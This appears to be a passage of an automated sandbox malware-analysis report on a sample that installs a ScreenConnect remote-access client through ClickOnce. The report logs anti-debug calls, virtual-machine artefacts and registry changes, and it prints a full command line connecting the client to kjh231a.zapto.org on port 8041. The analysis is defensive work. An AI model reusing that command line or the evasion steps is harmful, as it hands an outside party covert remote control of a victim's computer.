                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2241334465.0000021CEAA36000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2237356712.0000021CE89F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2607356741.000002074AC54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2605932091.000002074562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605859392.000001E11B0D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605455938.000001E11B02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1809581560.000000000102D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: svchost.exe, 00000008.00000002.2606377277.000001E11BE0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWare
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_0091191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0091191F
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00911000
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00913677 mov eax, dword ptr fs:[00000030h]0_2_00913677
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00916893 GetProcessHeap,0_2_00916893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00911493
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_0091191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0091191F
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00914573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00914573
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911AAC SetUnhandledExceptionFilter,0_2_00911AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7648 -ip 7648Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 748Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q3jdg51v.apm\a1ebh2z2.xz4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=%2f&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q3jdg51v.apm\a1ebh2z2.xz4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=%2f&i=untitled%20session" "1"
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911BD4 cpuid 0_2_00911BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00911806
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe
